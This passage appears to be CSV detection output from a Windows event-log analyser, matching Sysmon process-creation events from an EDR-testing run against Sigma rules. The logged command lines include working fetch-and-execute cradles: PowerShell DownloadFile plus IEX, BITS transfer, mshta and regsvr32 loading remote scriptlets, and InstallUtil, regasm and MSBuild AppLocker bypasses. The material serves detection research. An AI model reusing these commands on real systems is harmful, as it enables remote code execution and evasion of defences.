Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: 